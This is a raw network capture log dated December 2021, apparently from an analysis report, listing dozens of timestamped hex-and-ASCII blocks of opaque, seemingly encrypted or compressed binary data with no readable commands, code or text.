                                                          2021-12-14 13:10:57 UTC170INData Raw: 76 9c 27 ef 4d 1a 6e ed 5a d0 db 7e 06 eb d1 2b dd fc 4a 7a 4e b6 f7 1a 73 4c b3 53 98 d2 9f 07 c5 a2 63 f6 6d c3 b2 5b 12 50 f7 4c b0 80 f8 8b b3 30 11 17 f3 9a ef 74 c6 a5 6c a9 a8 b0 4e bd d5 59 ca 3b 0b f3 60 c6 4c c4 b2 8f a1 03 04 c1 02 63 d3 bc 27 38 a4 fd 06 af 9a 9e 0c 3b e8 31 e6 ac f8 65 5f cb aa 22 0b 8b b5 c4 f0 96 25 d8 e2 d3 93 fc b7 be 3f dd ee 0d bc 56 d8 d8 e4 f5 2b ad ee 85 7e 4c 8a 22 39 71 14 3d c1 99 ff f4 85 da ab f6 4e 26 78 07 12 fe b8 25 1d 71 38 60 3d e4 3a 20 d5 bc 73 bd 03 fd ef 0d 82 b6 ca 07 0d 32 be 6c 69 5e 91 87 fa 84 0b 42 ff 38 d3 a8 2a 8d 51 eb ed a7 f6 d5 21 b7 12 8e aa b1 56 41 82 c0 7a 56 3d fe 1e a5 ad 16 0c f7 af d2 2d 05 eb 3f eb d8 68 b3 98 3b 39 18 b8 32 7a 3c 55 51 c3 10 60 e8 bd b5 a5 b0 31 75 55 dd 56 26 21
                                                          Data Ascii: v'MnZ~+JzNsLScm[PL0tlNY;`Lc'8;1e_"%?V+~L"9q=N&x%q8`=: s2li^B8*Q!VAzV=-?h;92z<UQ`1uUV&!
                                                          2021-12-14 13:10:57 UTC171INData Raw: 8e 43 fa 8e f9 5f 47 44 b7 4a e5 27 9d 84 59 ee e0 13 93 de 96 58 1c 8a bc d8 d5 5c a0 b1 83 e4 b7 2e c9 0a 84 ab d4 8a 5a c4 31 e9 ae a5 5d 08 84 08 af 56 3f da 84 a8 1f 84 f2 25 16 40 40 8f 7e 23 7b a5 cd 7d d8 5d 4a d3 5c 90 73 20 c0 52 8e 30 d2 ba 2b 57 bc cc 2f 8d b1 af 30 52 1f c4 42 53 90 46 62 9e 2a 4d e0 c2 d9 41 9a 4d 8e de 67 1a 1f 7d af d9 09 c3 32 ba e9 4f 44 13 78 45 36 7a 4d 44 71 e4 33 af 90 9e b2 c7 33 50 3e f2 7b 26 42 64 97 c7 b6 50 76 21 27 ee ae 82 b1 cc 17 8b 38 26 84 59 7b 55 11 13 d9 f2 9d 41 98 ef f3 24 dc 92 68 72 f9 f8 41 9b 06 0e 73 10 82 53 3d 70 43 c9 7c c4 51 3f 4e 2e 3b 67 c4 b1 0d ff f6 52 30 59 35 b5 db 9d ce 39 4a 16 ca d5 30 ce ab 97 56 e3 b4 27 76 7d 8f 1d 91 be c8 81 af 54 f4 6f 30 50 e9 9a 34 d8 c6 e1 f2 09 84 22 cb
                                                          Data Ascii: C_GDJ'YX\.Z1]V?%@@~#{}]J\s R0+W/0RBSFb*MAMg}2ODxE6zMDq33P>{&BdPv!'8&Y{UA$hrAsS=pC|Q?N.;gR0Y59J0V'v}To0P4"
                                                          2021-12-14 13:10:57 UTC172INData Raw: 11 75 69 88 d8 16 10 ae 3e 23 ea 37 61 4a cd e3 f7 0a fa e2 fa 08 d7 40 a9 ea a1 28 0e 9e 49 48 62 55 5f e1 9b 76 15 65 da c5 36 5a 14 b8 7f 10 e3 c3 2a 8c 2c 66 33 8d 6c f7 e2 10 4d a5 5b 0f d5 c8 e4 e9 62 ba 2c 6d c7 d6 5a 04 58 e5 4d e7 bb f0 ae 47 e9 11 2f b7 9b ee 74 51 a2 18 e0 a0 4e f7 6a d5 1d 8e 3a 0d f3 f7 c1 57 bc 9f aa 99 d6 04 b9 46 62 97 be 04 2a bf 79 2b 51 9b d1 0c bf af 30 e0 b4 d1 46 a6 e3 bb 0c 0a db b5 7c b7 97 63 db 80 de 35 c4 a6 26 3c 8d ee c9 fb 57 9e db bc f8 32 19 de a0 7a 1d 8a da 7e 70 52 3e a6 94 4c 32 b5 24 aa a7 4e 22 3e 06 14 e6 91 06 e4 65 03 45 39 b6 3a 18 93 bd 35 be 61 f0 49 32 b9 48 cb 55 0d 76 f8 6d 2f 5d c9 8a e3 04 21 6c fe 6b d3 d0 6c 8c 17 e8 8a aa 45 44 0b 2f 11 dd aa 35 10 40 84 d8 53 75 c4 59 1a 14 a9 42 0c 4f
                                                          Data Ascii: ui>#7aJ@(IHbU_ve6Z*,f3lM[b,mZXMG/tQNj:WFb*y+Q0F|c5&<W2z~pR>L2$N">eE9:5aI2HUvm/]!lklED/5@SuYBO
                                                          2021-12-14 13:10:57 UTC173INData Raw: fe e3 8e 83 9a 56 5a a8 88 9a e8 a5 b0 da 6d 7a 97 53 0c 5a 61 fb dc ad c4 74 4c ba d5 76 f3 b5 a7 29 cb 66 7b f5 ad a6 2f 46 64 30 4b f6 27 f5 80 9a c5 ef 3a 58 ab 97 2c 9b 8b af d8 22 54 a8 93 8c b4 54 5a c8 46 0c aa c7 8a 48 c2 87 7a 85 b6 4d 7f 85 30 25 57 2c da 40 a8 a9 92 df 36 a6 37 41 c3 f5 22 68 a5 00 69 28 db 61 a5 db eb 72 80 4b 53 9d 30 c4 9d db d1 97 5a 94 ee b0 1b 12 52 0c c4 d5 54 32 67 6d 8d c2 28 e1 4a 55 40 89 4d 19 b9 f8 89 34 fd be bd 08 23 be bb fa 4f 0c 12 20 76 39 69 25 20 70 ff be ae 83 9e ba a7 c0 2d 04 e1 33 40 43 4e 1a c6 a5 50 ea 67 ff 7b 85 7c e4 a5 16 b3 b5 27 97 59 33 43 9e 26 d6 74 51 29 99 43 7e 25 cf 92 59 70 22 6d 6a b0 6e 65 72 10 0c 52 2e 70 85 dd b1 49 7a 0e e6 45 3a cb 4a b0 1e ff 8a 75 c0 df 1e f6 6b f3 cf 5d c5 17
                                                          Data Ascii: VZmzSZatLv)f{/Fd0K':X,"TTZFHzM0%W,@67A"hi(arKS0ZRT2gm(JU@M4#O v9i% p-3@CNPg{|'Y3C&tQ)C~%Yp"mjnerR.pIzE:Juk]
                                                          2021-12-14 13:10:57 UTC175INData Raw: 61 c6 94 fc f7 92 95 d5 ec 12 55 73 7b 13 dd 1b ed 20 80 d5 bd 5c c3 2b f3 66 cf 78 ee 48 cd 04 40 2c 91 5b 65 1a b6 d9 a2 ce af 38 2b 70 2c a1 dd 87 55 77 34 fb 62 25 09 d1 48 41 f1 e8 be 43 c0 fa 76 63 89 80 e0 9d 7e e0 7e 1a d7 7d ae db 86 7e 30 03 c2 2c 84 f3 79 7a 9e 26 a9 11 2e 4c cd bb 0e d3 c0 08 f1 a2 2d 60 c6 e9 ef 5b 48 b9 e4 4b ef 8f cc 8b d4 a6 da 3d 8e 9a 1a 95 50 a4 10 a6 9b b0 e4 23 c5 52 b7 3b 8d 18 f6 c7 5f c4 81 8f 59 98 8f d1 7f 63 d7 52 05 2c b7 fd 35 af 0d 9f 72 10 96 31 24 44 d0 40 ae c9 99 22 19 8c cb ef 8e 96 d7 f9 80 d8 3d f3 94 a6 16 f8 fd 0d c2 56 de 28 bd fe 3a a2 dd 85 e9 4d 52 09 47 71 96 ca a7 92 44 fb b6 da 3c f7 be 0d 06 07 30 10 90 00 ec 73 0b 60 2f e3 30 0c ab bc 4d 49 60 f6 41 02 a1 ae e3 22 2e 11 c0 6c bf aa c8 8c eb
                                                          Data Ascii: aUs{ \+fxH@,[e8+p,Uw4b%HACvc~~}~0,yz&.L-`[HK=P#R;_YcR,5r1$D@"=V(:MRGqD<0s`/0MI`A".l
                                                          2021-12-14 13:10:57 UTC176INData Raw: 2e 46 a5 d3 f1 e7 ea 14 68 e9 70 be bb 65 9d c2 cd 27 95 b4 1e 03 cf 9a 1b 06 19 8d 10 00 e7 e9 07 3c 09 84 18 8f 2f 98 54 4b a8 1f 0d f9 e0 d5 3c c1 81 96 94 0e 58 67 fb ce 3c d7 a9 3f 5c 1b 8d f2 56 a5 2b cd 7e 52 46 8e 15 4a a0 46 ca 4a 09 25 f7 86 82 ec 5c 13 7c d9 71 5a 61 8a b4 db 20 55 b0 ba 3f e4 83 3e 2e 08 f9 ab f0 89 4a c3 87 ed 12 a5 76 0d 63 0a d2 56 7e d9 42 a9 a9 80 4e 25 51 50 a7 8d 03 23 05 a6 02 78 28 4c f6 d3 9d 99 94 22 bd 52 14 33 c6 8b db 46 00 cc 83 88 56 ad 4d 52 a8 c7 d7 52 2a 4e de 9e 4d 5a 07 c0 a4 41 49 4e 1b df fb 1e a3 7d c1 db ee c1 4f ba 26 4c 0e 14 38 5f 8a 7a fc 52 96 e6 4e af 74 9d b8 c1 c3 41 82 f2 96 29 a5 66 ea c7 b6 54 e8 23 fc ec 12 82 e6 d0 f0 89 45 26 b8 5d 31 52 86 09 65 f2 20 42 7f ed 8e 24 84 96 5b 66 22 fa fd
                                                          Data Ascii: .Fhpe'</TK<Xg<?\V+~RFJFJ%\|qZa U?>.JvcV~BN%QP#x(L"R3FVMRR*NMZAIN}O&L8_zRNtA)fT#E&]1Re B$[f"
                                                          2021-12-14 13:10:57 UTC177INData Raw: b3 76 ff 6e cf 88 c2 25 77 3d de 5b 84 9d 20 a5 9c 3e 64 ef e4 1f 90 2b 63 b4 4b 91 e0 af d3 ca 05 1c 83 60 9a 99 fe e6 8a ba 66 6a 4c 29 95 cd 4c dd 65 e0 22 86 cd 94 ef d0 93 88 80 cd db ef d7 c0 06 56 2c 06 cc 75 a0 ca 3f 14 6d ae f9 26 72 3a a1 4a 10 e3 5f 4e 1d e0 87 08 32 45 43 e7 e8 29 d4 9e 12 0a 85 57 22 e1 98 70 e2 68 1a c5 ec 5a b2 fc 98 12 9e c3 0a 8a f1 6f 7a 8c b7 f7 4f 51 aa a7 26 0f 94 ce 0a e0 a2 ba f7 6d e7 9a bd 06 25 e5 22 e1 8d dd 8b 43 31 11 9b f1 7c ec 09 51 2f 1e a4 8d b0 f6 b2 d5 48 c0 dd 0f 8e f7 6a 51 c6 97 8f 9d 0f 04 77 00 85 95 c3 04 e3 b9 ff 23 af 9a 08 0c 52 ff d7 e2 c9 d1 b1 a0 cb 8f 22 0b 1d b5 24 f1 70 61 a6 80 ca 32 f1 92 be 3f 4b ee 9e ab b0 9c a6 bc cd 35 a0 cb 85 7e da 8a 28 39 97 50 43 a6 c6 4b f9 a0 da ab 60 4e d1
                                                          Data Ascii: vn%w=[ >d+cK`fjL)Le"V,u?m&r:J_N2EC)W"phZozOQ&m%"C1|Q/HjQw#R"$pa2?K5~(9PCK`N
                                                          2021-12-14 13:10:57 UTC179INData Raw: be f6 a6 e9 d5 c6 2a 83 45 93 38 81 b9 a7 ab f0 db 6d 85 6f aa 27 f8 ef 40 00 68 b9 6d d5 32 d6 76 7f 82 37 44 33 d3 78 73 0c d1 25 0f 04 c1 b9 d5 84 c0 5b 27 9b 28 f8 9b b7 7c 88 79 1b 5f 09 02 71 e9 b4 a8 ef 77 55 69 81 e7 56 b8 b1 1d 9b f9 86 57 da 11 f9 70 51 71 5a 72 e1 cc aa d7 74 ab ba 02 c1 14 b7 da 29 fb 64 50 d0 8e 85 c8 46 49 b1 ac f4 5a f5 d1 98 ee ca 13 7b 4c 97 d9 2d 6c ad a5 22 2d aa b8 a9 e4 77 bd c8 3d 82 4d c5 f7 48 59 9d ef 84 a5 4d 98 85 3f 9d b0 2e a7 40 15 b3 82 d8 25 a6 d0 41 ee 78 c5 6a d8 00 a6 32 4e 60 d3 f8 0c 72 f3 f4 b4 9f 4d c4 74 c1 44 96 cc b7 09 b0 ce 31 b4 0e b9 d5 72 31 4c 48 9e c2 cf e1 79 df a7 8b 30 19 9e e0 1c 35 7d 9f 5a 08 77 33 5c f8 32 0c 76 23 5d 1c 7a 25 c7 70 cb 34 49 81 e3 ba 45 d8 43 14 f2 33 a7 43 82 96 21
                                                          Data Ascii: *E8mo'@hm2v7D3xs%['(|y_qwUiVWpQqZrt)dPFIZ{L-l"-w=MHYM?.@%Axj2N`rMtD1r1LHy05}Zw3\2v#]z%p4IEC3C!
                                                          2021-12-14 13:10:57 UTC180INData Raw: a3 6e 5f 2e e4 67 2c 5f 23 9c c5 06 ce d1 50 ec 3a 75 45 f0 eb 28 15 e8 66 c0 68 76 5f b2 bc a8 5e 5f 5c 25 76 cb ca 29 f6 bb c3 6d 4d dc b4 a1 9f b6 a5 c2 ae 82 e5 b8 f9 a8 5b 61 a4 6d 93 76 af 03 68 e3 da fa 86 c4 e9 fc d7 ac b8 f0 6a 12 be 73 f0 10 3b 19 90 20 d5 eb 96 79 d0 2b 18 66 21 a2 09 4a b0 04 23 0a 04 5a 75 11 5d d9 7f 31 48 3a 56 70 ac 87 48 86 e3 73 df fb fa ff ee d3 35 41 5f ce 2b 42 9e f1 9d 63 dc 7a 07 9f 03 e0 b1 3c c7 7a 5a d0 6d 7e 59 e6 25 2e f9 f3 94 5c 8e 21 f7 1a c5 4c 61 70 e9 d1 bd 08 fd 85 b8 61 6d c3 04 5b 77 5d 03 49 92 8f e2 ac 41 a7 11 17 65 9a 24 44 b7 a6 6d a6 ec 97 f4 24 d5 59 5c 3b 90 f6 11 c5 22 c4 14 a8 9f 99 04 c1 94 63 63 8e e2 2e ca fd 86 88 98 9e 0c 3b 7d 31 35 b1 37 42 d3 c9 48 05 09 8b b5 c4 65 96 7d ea 66 da 40
                                                          Data Ascii: n_.g,_#P:uE(fhv_^_\%v)mM[amvhjs; y+f!J#Zu]1H:VpHs5A_+Bcz<zZm~Y%.\!Lapam[w]IAe$Dm$Y\;"cc.;}157BHe}f@
                                                          2021-12-14 13:10:57 UTC181INData Raw: 74 e6 e5 21 96 a7 38 50 d4 47 a4 8e e9 ec 0f 7c c7 60 48 10 af 3d 50 68 21 f2 99 6c 48 ef 2d 2e a8 d4 ae f8 65 40 c3 bf 20 65 e7 47 b6 0a 83 2f a7 6a 4d 3d ec fb 89 c6 43 fa a9 72 02 fe b9 1d 46 d4 86 1c 99 0f 53 46 54 e1 7a e5 0c 16 83 e9 ab bf 5f 67 e0 c2 d3 15 99 be f8 01 24 9a 58 13 fd 8f 6d 00 d8 db b6 3e ef 86 f3 8f 74 99 b0 49 d5 1f 51 cb 84 c1 da c3 6a 96 80 15 bc 65 86 ce 41 e5 76 3d ba 19 66 f2 94 a3 cf cf 03 52 dc bd 87 5e 46 44 21 4a f8 3c 13 84 ff ec e4 20 79 da 97 58 8a 8a e4 dc c4 57 cd ba e6 d7 75 2b c8 0a 12 ab 26 95 ae c1 fa ed f4 96 4f 0e 85 08 39 56 53 de a6 ab d4 80 4a 16 a4 46 41 8f e8 23 63 84 e6 7a 55 4c d4 e0 fa 9a 72 20 56 52 5a 34 22 89 a6 46 43 ff b5 9f b0 af a6 52 4e e5 33 50 57 4e be ad c0 59 e1 c2 4f 41 78 49 ff dd 86 1e 2d
                                                          Data Ascii: t!8PG|`H=Ph!lH-.e@ eG/jM=CrFSFTz_g$Xm>tIQjeAv=fR^FD!J< yXWu+&O9VSJFA#czULr VRZ4"FCRN3PWNYOAxI-
                                                          2021-12-14 13:10:57 UTC182INData Raw: 24 af e0 78 7f 3e 53 af 86 c4 9f 5e 88 31 df 7a e6 80 b4 ae b8 aa dc d6 2c be 08 e0 a0 1c 48 f1 7e e7 36 45 ec 20 c8 6c 3f 2e 10 1d 9e 53 06 86 43 b6 eb 4d 93 eb a8 e9 59 2b ea f0 c0 b6 ff b9 1a c3 4e 92 07 5e b6 48 c9 5c 29 8a 29 25 50 24 3a 59 f9 9d 02 9b c0 38 82 ed 0f 1f 7e 24 87 b6 36 91 a3 91 01 fe e3 1e 68 60 41 80 1a e4 f7 ba 07 54 10 28 73 cf a7 dd e5 ef c6 84 b0 94 60 ef 29 8e 66 cf 30 ef a3 d8 e2 54 51 06 61 4a 13 cb d9 16 86 ae 10 28 96 38 dc 4a da dc 71 49 fb e2 6c 08 3f 5e a7 e5 95 29 3f a1 f3 0b 63 55 c9 e1 c1 7d 06 6a 67 c5 e4 65 d2 fb 7e 10 75 c3 07 93 15 6d 07 8c e1 c8 18 53 4c a5 cd 0f 55 c3 ee e2 df ba 80 52 c1 92 5b 04 ce e5 1e f8 69 df f6 43 a4 51 15 f3 9a ee e2 51 14 13 40 8f cd f6 01 95 5b ca 3b 0d 65 f7 12 48 22 95 f2 9d df 44 c3
                                                          Data Ascii: $x>S^1z,H~6E l?.SCMY+N^H\))%P$:Y8~$6h`AT(s`)f0TQaJ(8JqIl?^)?cU}jge~umSLUR[iCQQ@[;eH"D
                                                          2021-12-14 13:10:57 UTC184INData Raw: 30 75 13 de a7 2d 7a 94 e4 b4 67 b3 21 42 fa e0 0c 76 84 38 a3 ef be 77 2c dc ed f5 50 c1 83 5b f7 0d e2 3a 00 26 6d 94 22 72 52 42 47 4f 0e 0f 6c 74 9a 27 2c 4a b7 e5 3f c6 68 78 67 7f 9a 01 09 2b 61 aa 1d e4 fa f3 40 eb 3e c6 32 9b a1 91 45 81 c5 ed 68 db 3d 6f 6e 6f 6b 38 1c ed 3d 00 f2 f2 1f d0 d4 d4 9d 7f a5 2f a0 31 ae 78 c8 47 14 15 e9 06 2a b9 46 9a 24 59 5a 9b f1 b3 03 b2 9a 8a 92 1b 57 11 e6 73 94 b4 4f a4 84 65 8f 83 0c 56 12 af f9 99 84 86 52 91 c1 fc 96 53 9a 5a 60 f9 28 a8 aa 74 88 f1 1b f0 f2 b5 31 29 17 79 b4 d2 f3 85 89 0d 46 b7 4a f6 b1 f5 05 80 0a c8 6e 7b 23 dc 5a 1c 8a af 4e 22 5d ba 5c ab 99 77 30 84 08 84 ab c7 1c 48 6e 85 0b 86 d8 4d 33 c9 0a af 56 2c 4c 40 eb bd 66 da 58 a6 18 0d 8d 7e 23 68 33 00 af 2a aa 62 ae f8 e5 3e 22 c0 52
                                                          Data Ascii: 0u-zg!Bv8w,P[:&m"rRBGOlt',J?hxg+a@>2Eh=onok8=/1xG*F$YZWsOeVRSZ`(t1)yFJn{#ZN"]\w0HnM3V,L@fX~#h3*b>"R
                                                          2021-12-14 13:10:57 UTC185INData Raw: d5 e1 56 0f 34 36 07 25 01 34 fb 83 7d 3b 76 ee 99 04 53 63 72 ea f9 8a e8 aa 01 ba 3e 83 2e 2d 86 99 a7 cf ef e2 cb 29 3c c5 af 82 50 79 f8 d8 d7 d6 39 e4 55 e2 ac 2e aa 0b 47 ca 28 70 06 8f 5f 4a 07 28 e5 a0 45 6c b4 2e 85 72 c8 5d 5e 9c 44 51 84 d5 b6 ee d1 75 25 d0 0f 2a 68 e8 c9 97 b4 69 b9 b0 57 a8 85 4b b8 27 0b cb 06 7e 88 bf 25 6f a6 dc ad 81 7b b4 d8 c2 44 d5 ef 99 1f aa b0 61 8b 7a 77 74 d2 03 60 b4 1c fe 60 c6 02 fc d7 8c 5c f2 17 12 97 24 cd 31 dd 1b 7b 20 ac ff 72 7b ad 2b 6e 31 cd a6 ef 48 5b 04 0d 2a e0 58 08 11 ca 81 14 10 ae 38 bd 70 16 92 ac 84 9e 73 6a a3 e0 fa 08 d1 de 41 62 ee cf 40 e3 f1 4e 3b 57 5f e1 9d e8 e0 9f 2e 23 78 27 d0 9c 26 12 e3 c3 2c 12 f3 37 7b 6a 23 8a 1a da 14 a7 5b 0f d3 56 08 52 a4 5c 63 10 c3 39 03 06 58 e5 4b 79
                                                          Data Ascii: V46%4};vScr>.-)<Py9U.G(p_J(El.r]^DQu%*hiWK'~%o{Dazwt``\$1{ r{+n1H[*X8psjAb@N;W_.#x'&,7{j#[VR\c9XKy
                                                          2021-12-14 13:10:57 UTC186INData Raw: fe 3b a5 ad 16 2c f4 ac d2 6b 06 a9 32 29 d7 4d b3 98 3a 39 d2 b6 32 3c 3d 0d a2 00 1f 45 e9 bd c3 b6 b0 32 74 13 a8 22 2d 5d a7 02 c0 09 b3 60 09 f8 96 1f 76 12 39 fb 9f 4b 75 51 dd 8e c9 41 c1 83 5a 61 7b d8 09 e6 25 10 77 87 38 50 40 47 f3 a8 0f ee 73 7c 50 71 4a 10 ad 3d 6d 58 78 f1 7e 6e 43 fc 29 1c ab d4 d8 eb f3 40 ea a8 b0 74 9a 47 92 38 f7 3c a7 6a da 3d 19 eb 6f c4 3f fa 99 53 00 fe b8 1d a6 c7 d4 0b 7e 0d 58 55 33 d3 79 e5 7a 05 15 e9 07 bc cf 76 9d c2 5a 27 ed ad f8 01 b3 9a fc 17 1b 8d 11 00 04 c9 b4 3e ed 86 ce bf 83 9a 57 4b 4b 3f 9b f9 84 c1 66 f3 fc 96 52 0c 2c 74 fb ce ab d7 02 2e ba 19 f1 f2 c3 b4 29 cd 7f 52 a6 9d 85 5e 47 44 c1 59 f6 27 f4 86 f4 ff ca 13 7a da e1 4b 1c 8a ae d8 54 46 b0 ba a8 e4 01 38 c8 0a 85 ab b1 99 48 c3 86 ed f2
                                                          Data Ascii: ;,k2)M:92<=E2t"-]`v9KuQAZa{%w8P@Gs|PqJ=mXx~nC)@tG8<j=o?S~XU3yzvZ'>WKK?fR,t.)R^GDY'zKTF8H
                                                          2021-12-14 13:10:57 UTC187INData Raw: 9b 4e 28 cd 9e 67 38 d8 74 4b f3 55 a5 79 7a e2 13 52 4d 8a 8c 80 97 7a 18 dc dd dc 67 14 78 ed c3 36 44 c1 da c5 86 76 1a c4 66 79 a5 96 bf 65 72 73 97 0d 19 64 1b 91 59 86 a3 5c cc 06 c3 3c c8 a3 74 e9 f5 43 e4 b7 f1 78 be 3c b9 bc e4 c3 10 5e a2 2f a7 41 35 82 fc ba ae af f2 d1 1c 92 f9 e5 cc 20 c1 f8 4c e3 79 47 6c 06 b2 6b eb 2e 03 17 8c 51 df 84 34 9b 4d 42 5c e8 9a d9 f3 17 09 f2 e7 a3 b2 bb 59 c3 a7 91 d2 5b cc 74 16 7b 87 8f 96 24 34 00 34 58 75 9f bb 85 7d 3d 93 ec c4 33 6f 23 00 b5 cb 84 bd aa aa fe 0d 36 27 65 1f 94 c4 f5 4a ba 99 6b f3 05 f5 cf 38 de 32 c8 06 86 cc 97 1f f8 ba 8d 67 cc 37 e6 88 cd 15 55 20 2b ab 70 70 ca 6d 03 12 a8 39 28 ee 2c d2 4f 87 e0 45 53 58 e1 eb 0b ec 51 46 e1 f9 2a 5a ac e8 0d ca 54 8d f1 7d 7d 49 69 76 d5 69 5a 94
                                                          Data Ascii: N(g8tKUyzRMzgx6DvfyersdY\<tCx<^/A5 LyGlk.Q4MB\Y[t{$44Xu}=3o#6'eJk82g7U +ppm9(,OESXQF*ZT}}IiviZ
                                                          2021-12-14 13:10:57 UTC189INData Raw: 34 68 af 48 07 88 02 89 1f 41 57 3d 22 ac 85 a6 66 e6 73 a8 5c ff 97 b0 fb 8a d7 ab 9b 45 2d d8 ae 58 bb f2 92 a5 50 3d 72 f9 ad d7 42 23 9a 34 20 d2 64 96 8b 3b 68 1c f5 17 e6 35 5c 5e 8d 3e 56 e8 8c b1 24 91 21 75 82 df 36 38 4d ad 1b b3 c3 bd bd 06 e1 e5 bc 65 cf 36 ea ec 71 50 42 dc af ba 7b e4 90 5b 70 08 36 02 09 2a 01 91 13 33 6e 4b 6e 4a 4f 1a c0 73 55 20 0e 50 2e a6 14 c3 3c 62 cf 76 7f 30 50 2e e1 a4 35 ad e8 c7 8f e5 49 c5 9a ba 75 91 01 81 82 a8 55 da ec 6d 1a 60 b1 31 1b ec 88 2d 24 b1 ec d0 ea f3 81 70 dc 2c 2b 31 42 77 04 0f 81 15 c7 07 5d ba 79 a9 0d 55 1e 9b 9d ec 12 b2 cb 8f 2d 3e 9e 10 31 70 23 b8 d8 ed 9f 64 4b 93 7a 59 c7 a8 b3 b0 fe 96 5d da d2 d9 8d 43 a8 5a c4 d5 5e aa 73 74 07 8a 3c f4 c3 b4 70 24 16 7c 7b d1 1c b6 b6 45 25 b5 63
                                                          Data Ascii: 4hHAW="fs\E-XP=rB#4 d;h5\^>V$!u68Me6qPB{[p6*3nKnJOsU P.<bv0P.5IuUm`1-$p,+1Bw]yU->1p#dKzY]CZ^st<p$|{E%c
                                                          2021-12-14 13:10:57 UTC190INData Raw: c3 a2 e9 78 7e fa 16 81 25 12 8b 11 f5 43 63 73 7c c9 31 cb 32 3e 9e 34 f6 49 ea b0 42 ff 3a 70 f9 42 b6 b5 11 95 c4 26 e3 16 69 c6 23 d2 61 94 1b fb 6a 3c 66 7c 48 3e 08 b8 4e 81 b0 70 1b 6a 21 49 c1 bf e2 c7 d4 e6 e9 2a 07 36 e0 20 56 3c 4f ca ee 3a e1 ee e8 1b 6e 4c 3f e6 6a 95 78 fb 04 96 e5 9c b9 2a 36 93 b2 d2 7b e0 c1 75 96 c0 ae 85 ef 5c c4 f6 a0 d5 ad e4 7d ab a7 29 df 39 d5 ea dd 74 4c 98 37 6a f0 79 67 93 9e 73 b3 2f d1 42 34 7f 42 9d d3 13 c3 f5 1f ee aa 6a 61 c2 78 2c f7 f2 2b c2 57 68 ce a6 05 ab 71 7b 4d 2d ae c8 5d 2e 77 9f cb 70 21 db 72 a1 2f 96 b4 c5 24 8e df 9b 06 ad 0f 44 70 6b a0 71 86 26 ed e3 27 f9 49 e3 54 fc 37 88 55 e7 64 33 f9 71 2d 26 40 12 ac 27 af e8 87 79 69 28 d8 4e 67 87 56 4b ab 2c c7 2f bf 59 cc 25 7e f8 af 13 1f 30 95
                                                          Data Ascii: x~%Ccs|12>4IB:pB&i#aj<f|H>Npj!I*6 V<O:nL?jx*6{u\})9tL7jygs/B4Bjax,+Whq{M-].wp!r/$Dpkq&'IT7Ud3q-&@'yi(NgVK,/Y%~0
                                                          2021-12-14 13:10:57 UTC191INData Raw: d5 ae d4 ab ea 4f 26 7b 0f 14 de 90 26 e3 7b 1d 5c 3c d8 38 28 d6 fc 34 95 6e fe 41 46 a6 86 c5 0f 0d 7a bc 59 20 55 c9 c0 ea b1 21 4b ff 48 d2 ed 29 84 17 9c 8b 33 42 d3 04 cf 13 2a a5 b8 55 3d 85 71 5c 7b cc 69 3a 99 af 18 0c 6f ad 8e 7a 0e 89 ad 28 eb 4f bb 98 a6 38 24 b9 3c 3c fe 0c b0 2e 0d 45 2d bc 89 a7 a2 32 bc 12 e2 33 2f 5d 6b 03 cd 10 b1 60 d9 f9 9b 06 64 12 ed fa d5 5a 67 51 05 8f 83 50 d3 83 86 60 31 c9 1b e6 c5 11 a8 a5 36 50 ab 46 4f 98 01 ee 9f 7d d2 78 48 10 5e 3c 94 6a 70 f1 4f 6c 09 ed 21 1c 9e d6 eb f8 fb 40 d3 aa 39 6e 92 47 af 3a 7a 25 af 6a 9f 3f 53 fa 67 c4 76 f8 aa 40 08 fe e9 1f ec d6 dc 0b 2b 0f 6b 46 3b d3 20 e7 f3 1f 1d e9 5a be 42 6f 95 c2 3b 25 dd bc f0 01 da 98 75 0d 13 8d 7c 02 37 eb bc 3e 9f 84 24 8d 8b 9a 22 49 0c 10 93
                                                          Data Ascii: O&{&{\<8(4nAFzY U!KH)3B*U=q\{i:oz(O8$<<.E-23/]k`dZgQP`16PFO}xH^<jpOl!@9nG:z%j?Sgv@+kF; ZBo;%u|7>$"I
                                                          2021-12-14 13:10:57 UTC193INData Raw: 12 34 53 4b 12 9f 46 ad 90 e2 03 f5 ab 8d d5 ec b4 1f e6 31 53 9e d4 3a f0 8f 0d f9 8f 5b ef 93 ef f8 32 c4 8c 52 30 29 9d 60 4d 41 ef 79 53 8e 1c 22 2f 89 b9 bd 58 77 74 cf 55 37 15 c9 cc 13 48 87 bc cd a6 12 a4 41 b0 c1 7c 44 85 d7 4e 47 7f 7e 63 72 86 ef b9 78 ab 80 f1 8d 91 4f b8 cf 0f ce 0b 30 df f8 3b 24 23 c5 c3 d1 31 65 ed f0 c4 6d cf 85 c7 6d b4 64 56 1d d1 7d b9 86 c9 97 df 6a 64 10 66 2d 88 ac 6a f8 8b 54 fb 87 81 6d df 2b 3d ba 83 d0 67 4a af 27 46 52 7b 96 1e b8 e3 bc fd c7 dd ab 59 f7 d5 35 c7 e6 a9 f0 5f 52 5f 3a 69 76 1b 36 22 3b 02 4b b2 9e 6a ae 17 5f 76 f0 e6 f0 72 0c 82 e9 b5 af 14 a0 70 d8 88 8a 3c 44 55 6c b0 46 b6 90 77 3f bd 2a de 40 97 86 93 be 44 23 27 f6 27 04 49 3d 7c a8 7e 8d 17 b3 75 e2 42 02 32 7c 18 88 dd fb cd a7 9c 77 95
                                                          Data Ascii: 4SKF1S:[2R0)`MAyS"/XwtU7HA|DNG~crxO0;$#1emmdV}jdf-jTm+=gJ'FR{Y5_R_:iv6";Kj_vrp<DUlFw?*@D#''I=|~uB2|w
                                                          2021-12-14 13:10:57 UTC194INData Raw: f2 96 38 da cb d8 3f f3 ce bf 72 dd ef 0d e2 57 d3 db be fe 64 a3 84 85 7f 4c d5 23 75 71 50 3e c6 93 15 fb a1 da ca f7 1f 26 79 07 76 e7 c2 00 ed 73 7e 61 6e e4 38 20 b2 bd 60 be 60 f6 24 03 f2 b6 c8 07 6b 33 ea 6c 2e 5d ae 8d bc 8b 2c 42 97 39 8a a8 28 8d 7e e9 d3 ac 4f da 71 b6 49 8e ab b1 23 40 df d8 51 73 bb fd 66 a5 ac 16 74 f6 f1 d2 69 06 f0 35 76 d7 4c b3 e2 3a 66 18 b9 32 47 3e 6c 5a 0d 1f 39 e9 dc b5 a7 b0 4f 74 70 de 30 2d 23 a7 61 b6 18 b3 1f 09 9d e0 0d 76 92 39 9e e9 5a 75 c0 dd e9 bf
                                                          Data Ascii: 8?rWdL#uqP>&yvs~an8 ``$k3l.],B9(~OqI#@Qsfti5vL:f2G>lZ9Otp0-#av9Zu
